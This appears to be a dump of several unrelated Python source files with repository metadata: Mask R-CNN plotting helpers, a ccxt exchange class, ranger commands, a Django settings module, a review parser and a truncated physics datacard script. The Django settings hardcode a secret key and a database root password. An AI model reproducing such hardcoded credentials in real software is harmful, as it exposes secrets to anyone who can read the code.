        caption = "%s %d%%"%(label, int(score*100)) if score else label
        # ax.text(x1, y1 + 8, caption,
        #         color='w', size=11, backgroundcolor="none")
        # Clamp the caption baseline so text above the box stays on-image.
        yyy=y1 -16
        if yyy <0:
            yyy=0
        cv2.putText(masked_image, caption, (x1, yyy), cv2.FONT_HERSHEY_SIMPLEX, 1.5, [int(x*255) for x in (color)],4)
        # Mask
        mask = masks[:, :, i]
        masked_image = apply_mask(masked_image, mask, color)
        # Mask Polygon
        # Pad to ensure proper polygons for masks that touch image edges.
        padded_mask = np.zeros(
            (mask.shape[0] + 2, mask.shape[1] + 2), dtype=np.uint8)
        padded_mask[1:-1, 1:-1] = mask
        contours = find_contours(padded_mask, 0.5)
        for verts in contours:
            # Subtract the padding and flip (y, x) to (x, y)
            verts = np.fliplr(verts) - 1
            p = Polygon(verts, facecolor="none", edgecolor=color)
            # ax.add_patch(p)
            pts = np.array(verts.tolist(), np.int32)
            pts = pts.reshape((-1,1,2))
            cv2.polylines(masked_image,[pts],True,[int(x*255) for x in (color)],4)
    return masked_image.astype(np.uint8)
def draw_rois(image, rois, refined_rois, mask, class_ids, class_names, limit=10):
    """
    Visualise up to `limit` ROIs: dashed anchors, solid refined boxes,
    labels and unmolded masks; prints positive/negative ROI statistics.
    anchors: [n, (y1, x1, y2, x2)] list of anchors in image coordinates.
    proposals: [n, 4] the same anchors but refined to fit objects better.
    """
    masked_image = image.copy()
    # Pick random anchors in case there are too many.
    ids = np.arange(rois.shape[0], dtype=np.int32)
    ids = np.random.choice(
        ids, limit, replace=False) if ids.shape[0] > limit else ids
    fig, ax = plt.subplots(1, figsize=(12, 12))
    if rois.shape[0] > limit:
        plt.title("Showing {} random ROIs out of {}".format(
            len(ids), rois.shape[0]))
    else:
        plt.title("{} ROIs".format(len(ids)))
    # Show area outside image boundaries.
    ax.set_ylim(image.shape[0] + 20, -20)
    ax.set_xlim(-50, image.shape[1] + 20)
    ax.axis('off')
    for i, id in enumerate(ids):
        color = np.random.rand(3)
        class_id = class_ids[id]
        # ROI
        y1, x1, y2, x2 = rois[id]
        p = patches.Rectangle((x1, y1), x2 - x1, y2 - y1, linewidth=2,
                              edgecolor=color if class_id else "gray",
                              facecolor='none', linestyle="dashed")
        ax.add_patch(p)
        # Refined ROI
        if class_id:
            ry1, rx1, ry2, rx2 = refined_rois[id]
            p = patches.Rectangle((rx1, ry1), rx2 - rx1, ry2 - ry1, linewidth=2,
                                  edgecolor=color, facecolor='none')
            ax.add_patch(p)
            # Connect the top-left corners of the anchor and proposal for easy visualization
            ax.add_line(lines.Line2D([x1, rx1], [y1, ry1], color=color))
            # Label
            label = class_names[class_id]
            ax.text(rx1, ry1 + 8, "{}".format(label),
                    color='w', size=11, backgroundcolor="none")
        # Mask
        m = utils.unmold_mask(mask[id], rois[id]
                              [:4].astype(np.int32), image.shape)
        masked_image = apply_mask(masked_image, m, color)
    # ax.imshow(masked_image)
    # Print stats
    print("Positive ROIs: ", class_ids[class_ids > 0].shape[0])
    print("Negative ROIs: ", class_ids[class_ids == 0].shape[0])
    print("Positive Ratio: {:.2f}".format(
        class_ids[class_ids > 0].shape[0] / class_ids.shape[0]))
# TODO: Replace with matplotlib equivalent?
def draw_box(image, box, color):
    """Paint a 2-pixel-thick rectangle outline onto `image` in place.

    box:   (y1, x1, y2, x2) corner coordinates.
    color: list of 3 int values for RGB, broadcast into the edge pixels.
    Returns the mutated image.
    """
    top, left, bottom, right = box
    # Horizontal edges.
    image[top:top + 2, left:right] = color
    image[bottom:bottom + 2, left:right] = color
    # Vertical edges.
    image[top:bottom, left:left + 2] = color
    image[top:bottom, right:right + 2] = color
    return image
def display_detections(image, gt_boxes, boxes, masks, class_ids, class_names, scores=None):
    """
    Draw detection boxes, labels, masks and contours on a matplotlib axis.
    boxes: [num_instance, (y1, x1, y2, x2, class_id)] in image coordinates.
    masks: [num_instances, height, width]
    class_ids: [num_instances]
    class_names: list of class names of the dataset
    scores: (optional) confidence scores for each box
    Note: gt_boxes is accepted but not used by this function.
    """
    assert boxes.shape[0] == masks.shape[-1] == class_ids.shape[0]
    fig, ax = plt.subplots(1, figsize=(20,20))
    N = boxes.shape[0] # number of instances
    colors = random_colors(N)
    # Show area outside image boundaries.
    height, width = image.shape[:2]
    ax.set_ylim(height+10, -10)
    ax.set_xlim(-10, width+10)
    ax.axis('off')
    masked_image = image.astype(np.uint32).copy()
    for i in range(N):
        color = colors[i]
        # Bounding box
        if not np.any(boxes[i]):
            # Skip this instance. Has no bbox. Likely lost in image cropping.
            continue
        y1, x1, y2, x2 = boxes[i]
        p = patches.Rectangle((x1, y1), x2-x1, y2-y1, linewidth=2, alpha=0.7, linestyle="dashed",
                              edgecolor=color, facecolor='none')
        ax.add_patch(p)
        # Label
        class_id = class_ids[i]
        score = scores[i] if scores is not None else None
        label = class_names[class_id]
        x = random.randint(x1, (x1+x2)//2)
        ax.text(x1, y1+8, "{} {:.3f}".format(label, score) if score else label,
                color='w', size=11, backgroundcolor="none")
        # Mask
        mask = masks[:,:,i]
        masked_image = apply_mask(masked_image, mask, color)
        # Mask Polygon
        # Pad the mask to ensure proper polygons for mask that touch image edges.
        padded_mask = np.zeros((mask.shape[0]+2, mask.shape[1]+2), dtype=np.uint8)
        padded_mask[1:-1,1:-1] = mask
        contours = find_contours(padded_mask, 0.5)
        for verts in contours:
            # Subtract the padding and flip (y, x) to (x, y)
            verts = np.fliplr(verts) - 1
            p = Polygon(verts, facecolor="none", edgecolor=color)
            ax.add_patch(p)
    return plt.imshow(masked_image.astype(np.uint8))
def display_top_masks(image, mask, class_ids, class_names, limit=4):
    """Display the given image and the top few class masks.

    Classes are ranked by total mask area; empty slots are titled "-".
    """
    to_display = []
    titles = []
    to_display.append(image)
    titles.append("H x W={}x{}".format(image.shape[0], image.shape[1]))
    # Pick top prominent classes in this image
    unique_class_ids = np.unique(class_ids)
    mask_area = [np.sum(mask[:, :, np.where(class_ids == i)[0]])
                 for i in unique_class_ids]
    top_ids = [v[0] for v in sorted(zip(unique_class_ids, mask_area),
                                    key=lambda r: r[1], reverse=True) if v[1] > 0]
    # Generate images and titles
    for i in range(limit):
        class_id = top_ids[i] if i < len(top_ids) else -1
        # Pull masks of instances belonging to the same class.
        m = mask[:, :, np.where(class_ids == class_id)[0]]
        # Give each instance a distinct integer label so they render as
        # different shades under the colormap.
        m = np.sum(m * np.arange(1, m.shape[-1]+1), -1)
        to_display.append(m)
        titles.append(class_names[class_id] if class_id != -1 else "-")
    display_images(to_display, titles=titles, cols=limit+1, cmap="Blues_r")
def plot_precision_recall(AP, precisions, recalls):
    """Plot recall (x) against precision (y) on a fresh axis.

    AP: Average precision at IoU >= 0.5, shown in the title.
    precisions: list of precision values
    recalls: list of recall values
    """
    # Plot the Precision-Recall curve
    figure_and_axes = plt.subplots(1)
    ax = figure_and_axes[1]
    ax.set_title("Precision-Recall Curve. AP@50 = {:.3f}".format(AP))
    for set_limit in (ax.set_ylim, ax.set_xlim):
        set_limit(0, 1.1)
    ax.plot(recalls, precisions)
def plot_overlaps(gt_class_ids, pred_class_ids, pred_scores,
                  overlaps, class_names, threshold=0.5):
    """Draw a grid showing how ground truth objects are classified.
    gt_class_ids: [N] int. Ground truth class IDs
    pred_class_id: [N] int. Predicted class IDs
    pred_scores: [N] float. The probability scores of predicted classes
    overlaps: [pred_boxes, gt_boxes] IoU overlaps of predictions and GT boxes.
    class_names: list of all class names in the dataset
    threshold: Float. The prediction probability required to predict a class
    """
    # Drop the background class (id 0) from both axes.
    gt_class_ids = gt_class_ids[gt_class_ids != 0]
    pred_class_ids = pred_class_ids[pred_class_ids != 0]
    plt.figure(figsize=(12, 10))
    plt.imshow(overlaps, interpolation='nearest', cmap=plt.cm.Blues)
    plt.yticks(np.arange(len(pred_class_ids)),
               ["{} ({:.2f})".format(class_names[int(id)], pred_scores[i])
                for i, id in enumerate(pred_class_ids)])
    plt.xticks(np.arange(len(gt_class_ids)),
               [class_names[int(id)] for id in gt_class_ids], rotation=90)
    # Mid-point of the colormap; used to keep cell text legible.
    thresh = overlaps.max() / 2.
    for i, j in itertools.product(range(overlaps.shape[0]),
                                  range(overlaps.shape[1])):
        text = ""
        if overlaps[i, j] > threshold:
            text = "match" if gt_class_ids[j] == pred_class_ids[i] else "wrong"
        color = ("white" if overlaps[i, j] > thresh
                 else "black" if overlaps[i, j] > 0
                 else "grey")
        plt.text(j, i, "{:.3f}\n{}".format(overlaps[i, j], text),
                 horizontalalignment="center", verticalalignment="center",
                 fontsize=9, color=color)
    plt.tight_layout()
    plt.xlabel("Ground Truth")
    plt.ylabel("Predictions")
def draw_boxes(image, boxes=None, refined_boxes=None,
               masks=None, captions=None, visibilities=None,
               title="", ax=None):
    """Draw bounding boxes and segmentation masks with different
    customizations.
    boxes: [N, (y1, x1, y2, x2, class_id)] in image coordinates.
    refined_boxes: Like boxes, but draw with solid lines to show
        that they're the result of refining 'boxes'.
    masks: [N, height, width]
    captions: List of N titles to display on each box
    visibilities: (optional) List of values of 0, 1, or 2. Determine how
        prominent each bounding box should be.
    title: An optional title to show over the image
    ax: (optional) Matplotlib axis to draw on.
    """
    # Number of boxes
    assert boxes is not None or refined_boxes is not None
    N = boxes.shape[0] if boxes is not None else refined_boxes.shape[0]
    # Matplotlib Axis
    if not ax:
        _, ax = plt.subplots(1, figsize=(12, 12))
    # Generate random colors
    colors = random_colors(N)
    # Show area outside image boundaries.
    margin = image.shape[0] // 10
    ax.set_ylim(image.shape[0] + margin, -margin)
    ax.set_xlim(-margin, image.shape[1] + margin)
    ax.axis('off')
    ax.set_title(title)
    masked_image = image.astype(np.uint32).copy()
    for i in range(N):
        # Box visibility: 0 = gray/dotted/faint, 1 = dotted, 2 = solid.
        visibility = visibilities[i] if visibilities is not None else 1
        if visibility == 0:
            color = "gray"
            style = "dotted"
            alpha = 0.5
        elif visibility == 1:
            color = colors[i]
            style = "dotted"
            alpha = 1
        elif visibility == 2:
            color = colors[i]
            style = "solid"
            alpha = 1
        # Boxes
        if boxes is not None:
            if not np.any(boxes[i]):
                # Skip this instance. Has no bbox. Likely lost in cropping.
                continue
            y1, x1, y2, x2 = boxes[i]
            p = patches.Rectangle((x1, y1), x2 - x1, y2 - y1, linewidth=2,
                                  alpha=alpha, linestyle=style,
                                  edgecolor=color, facecolor='none')
            ax.add_patch(p)
        # Refined boxes
        if refined_boxes is not None and visibility > 0:
            ry1, rx1, ry2, rx2 = refined_boxes[i].astype(np.int32)
            p = patches.Rectangle((rx1, ry1), rx2-rx1, ry2-ry1, linewidth=2,
                                  edgecolor=color, facecolor='none')
            ax.add_patch(p)
            # Connect the top-left corners of the anchor and proposal
            if boxes is not None:
                ax.add_line(lines.Line2D([x1, rx1], [y1, ry1], color=color))
        # Captions
        if captions is not None:
            caption = captions[i]
            # If there are refined boxes, display captions on them
            if refined_boxes is not None:
                y1, x1, y2, x2 = ry1, rx1, ry2, rx2
            x = random.randint(x1, (x1 + x2) // 2)
            ax.text(x1, y1, caption, size=11, verticalalignment='top',
                    color='w', backgroundcolor="none",
                    bbox={'facecolor': color, 'alpha': 0.5,
                          'pad': 2, 'edgecolor': 'none'})
        # Masks
        if masks is not None:
            mask = masks[:, :, i]
            masked_image = apply_mask(masked_image, mask, color)
            # Mask Polygon
            # Pad to ensure proper polygons for masks that touch image edges.
            padded_mask = np.zeros(
                (mask.shape[0] + 2, mask.shape[1] + 2), dtype=np.uint8)
            padded_mask[1:-1, 1:-1] = mask
            contours = find_contours(padded_mask, 0.5)
            for verts in contours:
                # Subtract the padding and flip (y, x) to (x, y)
                verts = np.fliplr(verts) - 1
                p = Polygon(verts, facecolor="none", edgecolor=color)
                ax.add_patch(p)
    # NOTE(review): imshow is commented out, so the blended `masked_image`
    # is computed but never rendered — confirm intentional.
    # ax.imshow(masked_image.astype(np.uint8))
def display_table(table):
    """Render rows of values as an HTML table in the notebook.

    table: an iterable of rows, and each row is an iterable of values.
    """
    row_fragments = []
    for row in table:
        cells = "".join("<td>{:40}</td>".format(str(col)) for col in row)
        row_fragments.append("<tr>" + cells + "</tr>")
    markup = "<table>" + "".join(row_fragments) + "</table>"
    IPython.display.display(IPython.display.HTML(markup))
def display_weight_stats(model):
    """Scans all the weights in the model and displays a table with
    shape/min/max/std stats for each weight, flagging suspicious layers.
    """
    layers = model.get_trainable_layers()
    table = [["WEIGHT NAME", "SHAPE", "MIN", "MAX", "STD"]]
    for l in layers:
        weight_values = l.get_weights() # list of Numpy arrays
        weight_tensors = l.weights # list of TF tensors
        for i, w in enumerate(weight_values):
            weight_name = weight_tensors[i].name
            # Detect problematic layers. Exclude biases of conv layers.
            alert = ""
            # Constant weights suggest a dead layer (conv biases start at a
            # constant, so they are exempt).
            if w.min() == w.max() and not (l.__class__.__name__ == "Conv2D" and i == 1):
                alert += "<span style='color:red'>*** dead?</span>"
            if np.abs(w.min()) > 1000 or np.abs(w.max()) > 1000:
                alert += "<span style='color:red'>*** Overflow?</span>"
            # Add row
            table.append([
                weight_name + alert,
                str(w.shape),
                "{:+9.4f}".format(w.min()),
                "{:+10.4f}".format(w.max()),
                "{:+9.4f}".format(w.std()),
            ])
    display_table(table)
|
[
"noreply@github.com"
] |
himanshucodz55.noreply@github.com
|
e7b1a107e606889f4d2ea63f1cc95c913cd2cef3
|
13800b7827598e76428a335559b7bf11867ec2f0
|
/python/ccxt/async_support/binancecoinm.py
|
62ca72174bcc92699c5987d6f42bca5163a236e1
|
[
"MIT"
] |
permissive
|
ccxt/ccxt
|
b40a0466f5c430a3c0c6026552ae697aa80ba6c6
|
e4065f6a490e6fc4dd7a72b375428b2faa570668
|
refs/heads/master
| 2023-09-04T03:41:29.787733
| 2023-09-03T19:25:57
| 2023-09-03T19:25:57
| 91,253,698
| 30,798
| 8,190
|
MIT
| 2023-09-14T21:59:09
| 2017-05-14T15:41:56
|
Python
|
UTF-8
|
Python
| false
| false
| 1,683
|
py
|
# -*- coding: utf-8 -*-
# PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN:
# https://github.com/ccxt/ccxt/blob/master/CONTRIBUTING.md#how-to-contribute-code
from ccxt.async_support.binance import binance
from ccxt.abstract.binancecoinm import ImplicitAPI
class binancecoinm(binance, ImplicitAPI):
    # Auto-generated ccxt subclass for Binance COIN-M (coin-margined,
    # inverse) futures.  It only overrides exchange metadata and the two
    # spot<->futures wallet-transfer helpers; all trading logic lives in
    # the `binance` base class.

    def describe(self):
        # Merge COIN-M specific metadata over the base binance description:
        # exchange id/name, doc links, capability flags, and defaults that
        # restrict market loading to inverse contracts.
        return self.deep_extend(super(binancecoinm, self).describe(), {
            'id': 'binancecoinm',
            'name': 'Binance COIN-M',
            'urls': {
                'logo': 'https://user-images.githubusercontent.com/1294454/117738721-668c8d80-b205-11eb-8c49-3fad84c4a07f.jpg',
                'doc': [
                    'https://binance-docs.github.io/apidocs/delivery/en/',
                    'https://binance-docs.github.io/apidocs/spot/en',
                ],
            },
            'has': {
                'CORS': None,
                'spot': False,
                'margin': False,
                'swap': True,
                'future': True,
                'option': None,
                'createStopMarketOrder': True,
            },
            'options': {
                'fetchMarkets': ['inverse'],
                'defaultSubType': 'inverse',
                'leverageBrackets': None,
            },
        })

    async def transfer_in(self, code: str, amount, params={}):
        # transfer from spot wallet to coinm futures wallet
        # (3 is Binance's transfer-type code for spot -> COIN-M futures)
        return await self.futuresTransfer(code, amount, 3, params)

    async def transfer_out(self, code: str, amount, params={}):
        # transfer from coinm futures wallet to spot wallet
        # (4 is Binance's transfer-type code for COIN-M futures -> spot)
        return await self.futuresTransfer(code, amount, 4, params)
|
[
"travis@travis-ci.org"
] |
travis@travis-ci.org
|
215cc5ac5946240b17dc5fe3748953a92e0992d2
|
2dbcdf568b910af038f62a590e392c9c5d1a22a3
|
/.config/ranger/commands.py
|
6cb0560216bfbfff53a91008f2f4a07686ba4c4e
|
[] |
no_license
|
ianisl/dotfiles
|
ea6b9df7fe67a64d85bcbc5e87869415db2240d7
|
ad0f6908e3a01b7e6b21ab58dc6f73763c484399
|
refs/heads/master
| 2018-11-10T03:51:25.027073
| 2018-08-21T20:12:31
| 2018-08-21T20:12:31
| 116,000,595
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,701
|
py
|
from ranger.core.loader import CommandLoader
from ranger.api.commands import *
import os
class show_files_in_finder(Command):
    """
    :show_files_in_finder

    Present selected files in finder
    """

    def execute(self):
        import subprocess
        # Build an AppleScript list literal of the selected paths, e.g.
        # {"/a" as POSIX file,"/b" as POSIX file}, then ask Finder to
        # reveal them and come to the foreground.
        selection = self.fm.thistab.get_selection()
        files = ",".join('"{0}" as POSIX file'.format(entry.path) for entry in selection)
        reveal_script = "tell application \"Finder\" to reveal {{{0}}}".format(files)
        activate_script = "tell application \"Finder\" to set frontmost to true"
        # Echo the equivalent shell command in ranger's status line.
        script = "osascript -e '{0}' -e '{1}'".format(reveal_script, activate_script)
        self.fm.notify(script)
        subprocess.check_output(["osascript", "-e", reveal_script, "-e", activate_script])
class compress(Command):
    # Archive the marked files into the current directory with `apack`
    # (from atool), running asynchronously via ranger's loader.
    # Usage: :compress <archive-name> [apack flags...]
    def execute(self):
        """ Compress marked files to current directory """
        cwd = self.fm.thisdir
        marked_files = cwd.get_selection()

        if not marked_files:
            return

        def refresh(_):
            # Re-read the directory once apack finishes so the new archive
            # appears without a manual reload.
            cwd = self.fm.env.get_directory(original_path)
            cwd.load_content()

        original_path = cwd.path
        parts = self.line.split()
        # NOTE(review): parts[1] raises IndexError when the command is run
        # without an archive name -- confirm an argument is always supplied.
        au_flags = parts[1:]

        descr = "compressing files in: " + os.path.basename(parts[1])
        # Paths are made relative to cwd so the archive does not embed
        # absolute directory structure.
        obj = CommandLoader(args=['apack'] + au_flags + \
                [os.path.relpath(f.path, cwd.path) for f in marked_files], descr=descr)

        obj.signal_bind('after', refresh)
        self.fm.loader.add(obj)

    def tab(self):
        """ Complete with current folder name """
        # Offer "<dirname>.zip", "<dirname>.tar.gz", etc. as completions.
        extension = ['.zip', '.tar.gz', '.rar', '.7z']
        return ['compress ' + os.path.basename(self.fm.thisdir.path) + ext for ext in extension]
|
[
"ianis@ianislallemand.net"
] |
ianis@ianislallemand.net
|
0f375f087cd13a12480990221f7a3ae09da416aa
|
cde9386defde630e63c451d7ec49262bf25da615
|
/Closer_Django/CloserTest/settings.py
|
f1f6883bbafba09bb563960eccdcfefa36eda945
|
[] |
no_license
|
10356008/Closer
|
cd10467bded6f8b433896781e6513fd477f48845
|
fd73e67a0dfd953701ce4d031ac823b85f1ec054
|
refs/heads/master
| 2020-03-30T19:00:21.788899
| 2018-10-22T11:20:19
| 2018-10-22T11:20:19
| 151,190,485
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,450
|
py
|
"""
Django settings for CloserTest project.
Generated by 'django-admin startproject' using Django 2.0.6.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))

# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/

# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key is committed to source control; rotate it and load
# it from an environment variable before any production deployment.
SECRET_KEY = 'bqgh%&hf8%gf3d1!2num2as1auyc1#0d$ujvw1%(rw$lld@&o&'

# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True

ALLOWED_HOSTS = []

# Application definition

INSTALLED_APPS = [
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.admin',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'rest_framework',
    'closer',
]

MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]

ROOT_URLCONF = 'CloserTest.urls'

TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [os.path.join(BASE_DIR, 'templates')]
        ,
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]

WSGI_APPLICATION = 'CloserTest.wsgi.application'

# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
# NOTE(review): database credentials are hardcoded here; move them to
# environment variables / a secrets store before deploying.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.mysql',
        'NAME': 'closer',
        'USER': 'root',
        'PASSWORD': '10356031',
        'HOST': '127.0.0.1',
        'PORT': '3306',
    }
}

# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators

AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]

# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/

LANGUAGE_CODE = 'zh-hant'

TIME_ZONE = 'Asia/Taipei'

USE_I18N = True

USE_L10N = True

# Naive local datetimes are stored as-is (no UTC conversion).
USE_TZ = False

FILE_CHARSET = 'utf-8'
DEFAULT_CHARSET = 'utf-8'

# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/

STATIC_URL = '/static/'
|
[
"10356008@ntub.edu.tw"
] |
10356008@ntub.edu.tw
|
6d88e628ec6020fa871cd1298584dd235cb3b37d
|
e494163449c50ee0251a12130f61d8f236e9b83c
|
/databases/trip-advisor/parser.py
|
79d9f0c635ef6401756cfe1d8aaf6c6c8e6fd5c3
|
[] |
no_license
|
prximenes/diversified-group-recommendation-
|
705d7a89441d750f358e4b162eacf775404a0de4
|
80e57ec259f0dfeaac96cbfb76d033cadb0f2474
|
refs/heads/master
| 2020-06-14T23:43:34.319101
| 2019-07-04T02:36:14
| 2019-07-04T02:36:14
| 195,156,475
| 4
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,479
|
py
|
#!/usr/bin/env python3
import pandas as pd
import numpy as np
import csv
import os
def add_hotel_info(filename):
    # Parse one TripAdvisor review .dat file and append to the module-level
    # lists `ratings`, `users` and `hotels`.  The hotel id is extracted from
    # the filename, e.g. "hotel_1234.dat" -> "1234".
    # NOTE(review): ratings and users/hotels are appended independently, so
    # the three lists can fall out of sync if a review is missing either the
    # <Overall> or the <Author> tag -- confirm the input files always carry
    # both.
    datContent = [i.strip().split() for i in open(filename).readlines()]
    hotel_id = filename.split('_')[1].split('.')[0]
    for item in datContent:
        if item != []:
            if '<Overall' in item[0]:
                # Only single-token lines like "<Overall>5" carry the
                # numeric rating; multi-token variants are skipped.
                if len(item) == 1:
                    ratings.append(item[0].split('>')[1])
                #stuff.append(item[1].split('>')[1])
                #print(item)
            if 'Author' in item[0]:
                users.append(item[0].split('>')[1])
                hotels.append(hotel_id)
def get_list_from_csv(fp):
    """Read the CSV file at path *fp* and return its rows.

    Returns:
        list of lists of str: one inner list of string fields per CSV row.
    """
    # newline='' lets the csv module do its own newline handling, which the
    # csv docs require for correct treatment of quoted fields; list() on
    # the reader replaces the manual append loop of the original.
    with open(fp, 'r', newline='') as fil:
        return list(csv.reader(fil, delimiter=","))
# Module-level accumulators filled by add_hotel_info() for each .dat file.
users = []
hotels = []
ratings = []

# Parse every TripAdvisor .dat review file found in the current directory.
root = os.getcwd()
for filename in os.listdir(root):
    if '.dat' in filename:
        add_hotel_info(filename)

# Assemble the (user, hotel, rating) triples into one dataframe.
df = pd.DataFrame()
df['user_id'] = pd.Series(users)
df['item_id'] = pd.Series(hotels)
df['score'] = pd.Series(ratings)

target_dir = '../parsed-databases/'
csv_name = 'trip_advisor.csv'
if not os.path.exists(target_dir):
    os.mkdir(target_dir)
# First write includes pandas' index column and a header row (in cwd)...
df.to_csv(csv_name)

# ...then re-read it and rewrite into target_dir with the header row
# dropped (pop(0)) and the index column stripped (row[1:]).
ls = get_list_from_csv(csv_name)
ls.pop(0)
with open(target_dir+csv_name, "w") as out_csv:
    out_writer = csv.writer(out_csv)
    for row in ls:
        parsed_row = row[1:]
        out_writer.writerow(parsed_row)
|
[
"prxc@cin.ufpe.br"
] |
prxc@cin.ufpe.br
|
97fc5940358187146b320b40cc7aa844e2cd0896
|
67c38bc13d2f9807cb4ccdc47a1e1d1f95527ebb
|
/urls.py
|
8978a3553f309e53e3a1bb3e40aa0ffadfd124a7
|
[] |
no_license
|
kimjung-eun/jungeun_finalproject2
|
baa1a5ac783a79b622f75223aa5d3f05a3e87228
|
c6b174a2bffa5d5d8348b2dd8f26dcf41061532f
|
refs/heads/master
| 2023-08-30T05:12:33.180239
| 2021-10-19T11:35:29
| 2021-10-19T11:35:29
| 418,885,301
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 815
|
py
|
"""finalproject2 URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
import app.views
# URL routing: Django admin at /admin/, app home view at the site root.
urlpatterns = [
    path('admin/', admin.site.urls),
    path('', app.views.home, name='home'),
]
|
[
"kje0293@naver.com"
] |
kje0293@naver.com
|
ddb0511c7da10557a74469f32fdf621eef3c6942
|
3a093f6a40e8fb24957d277ad8f4b097d08c6d04
|
/result_scons/tools/cards.py
|
289cbf4c6c50e49e16d0902fa369f486a474e093
|
[] |
no_license
|
dlont/FourTops2016
|
ab9e953760e93b0e777b23478938efd30d640286
|
88c929bf98625735a92a31210f7233f799c5a10c
|
refs/heads/master
| 2021-01-18T22:23:52.796080
| 2019-07-31T12:34:03
| 2019-07-31T12:34:03
| 72,439,490
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,985
|
py
|
#!/usr/bin/env python
"""
Script for Higgs Combine cards creation
"""
import os
import sys
import time
import argparse
import logging
import json
from datetime import datetime
import pandas as pd
import numpy as np
import ROOT
from cards_proc_list import proc_id
from cards_syst_list import systtypelist
from cards_syst_list import syst_norm_size_list, syst_shape_size_list
from cards_bin_list import binlist
#Global definitions
def getObservation(ch, file, observable):
    """Return {channel: {bin: integral}} of event counts read from *file*.

    For every bin of channel *ch*, the histogram located at
    '<bin-with-channel-prefix-removed>/<observable>' is integrated.
    """
    logging.debug("----getObservation:-----")
    counts = {}
    for ibin in binlist[ch]:
        # Strip the channel prefix, e.g. mu6J2M -> 6J2M, then append the
        # observable sub-path to form the histogram name.
        histname = ibin.replace(ch, '') + '/' + observable
        logging.debug("Observations filename: " + file.GetName())
        logging.debug("Observations histname: " + histname)
        integral = file.Get(histname).Integral()
        logging.debug("Integral: " + str(integral))
        counts[ibin] = integral
    return {ch: counts}
def mcRate(ch, files, observable):
    """Return MC rate predictions per process:
    {process: {channel: {bin: integral}}}, reading each process's ROOT file.
    """
    logging.debug("----mcRate:-----")
    logging.debug(files)
    return {proc: getObservation(ch, files[proc], observable)
            for proc in proc_id.keys()}
def printCardHeader(arguments):
    # Write the Combine datacard preamble: a timestamped comment line, then
    # the counters -- imax (number of bins), jmax (number of processes minus
    # one), kmax '*' (autodetect number of systematics).
    # Python 2 `print >> f` syntax, consistent with the rest of this file.
    print >> arguments.outfile, '#',str(datetime.now()), arguments
    print >> arguments.outfile, '-'*100
    print >> arguments.outfile, 'imax', len(binlist[arguments.channel])
    print >> arguments.outfile, 'jmax', len(proc_id)-1
    print >> arguments.outfile, 'kmax', '*'
    print >> arguments.outfile, '-'*100
def printShapeFilesBlock(arguments):
    # Write the datacard 'shapes' block: one line mapping data_obs to its
    # histogram in the data file, then one line per MC process mapping it
    # to its nominal histogram and the $SYSTEMATIC-templated variant.
    print >> arguments.outfile, '-'*100
    for ibin in binlist[arguments.channel]:
        # Histogram path is the bin name without the channel prefix plus
        # the observable sub-path (same convention as getObservation).
        histname = ibin.replace(arguments.channel,'')
        histname = histname + '/' + arguments.observable
        logging.debug(histname)
        print >> arguments.outfile, 'shapes', 'data_obs', ibin, arguments.data, histname
        for proc in proc_id.keys():
            filename = arguments.sources[proc]
            logging.debug(filename)
            systname = ibin.replace(arguments.channel,'')+'_$SYSTEMATIC/'+arguments.observable
            print >> arguments.outfile, 'shapes', proc, ibin, \
                filename, histname, systname
    print >> arguments.outfile, '-'*100
    return
def main(arguments):
    # Build and print a complete Higgs-Combine datacard: header, shapes
    # block, observation line, then the per-process rate/systematics table.
    #pandas printing setting: never truncate columns when str()-ing frames
    pd.set_option('expand_frame_repr', False)
    pd.set_option('max_columns', 999)

    #Read-in input ROOT files (one per MC process)
    files = {}
    for proc in arguments.sources.keys():
        files[proc] = ROOT.TFile.Open(arguments.sources[proc],"READ")

    printCardHeader(arguments)
    printShapeFilesBlock(arguments)

